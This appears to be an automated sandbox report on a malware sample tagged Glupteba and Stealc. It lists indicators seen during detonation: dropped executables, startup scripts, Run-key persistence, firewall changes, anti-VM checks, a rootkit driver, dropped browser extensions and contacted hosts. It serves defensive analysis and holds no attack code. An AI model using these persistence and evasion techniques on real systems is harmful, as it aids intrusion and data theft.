Malware Analysis Report

2025-08-06 03:33

Sample ID 240419-rdjfssfb5t
Target d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4
SHA256 d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4
Tags
glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4

Threat Level: Known bad

The file d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4 was found to be: Known bad.

Malicious Activity Summary

glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Modifies firewall policy service

Stealc

Glupteba

Glupteba payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Drops startup file

UPX packed file

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of web browsers

Drops Chrome extension

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

Enumerates connected drives

Checks installed software on the system

Adds Run key to start application

Checks whether UAC is enabled

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Enumerates system info in registry

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 14:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 14:04

Reported

2024-04-19 14:07

Platform

win10v2004-20240412-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Stealc

stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LJbRIu2pCVXKEFdMDezjIokn.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoV9nPqeelROzDnfhz31XMfB.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hRsEISclko0hAwcIoZnJshZC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DG2z39swRqYzETAkX4aZiJaG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zhc2O9UdJG2ERo97CDUIVDA0.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YorvLNmeO6cy0VDWYWpi1XCP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wViCTUek5N8DiuvPF3ZYQ3ac.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe N/A
N/A N/A C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe N/A
N/A N/A C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2156 set thread context of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\ZWZyYuD.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\pbtbGil.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\RVqmAwyyxwiU2\pvwAWeNHfwRPL.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ARTXeDTAxvUn\izroyMN.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\QhciBzJOokLnyYZub.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
File created C:\Windows\Tasks\bWycNackLSywaqkmgR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\qbSDwEgyNYPZlGA.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
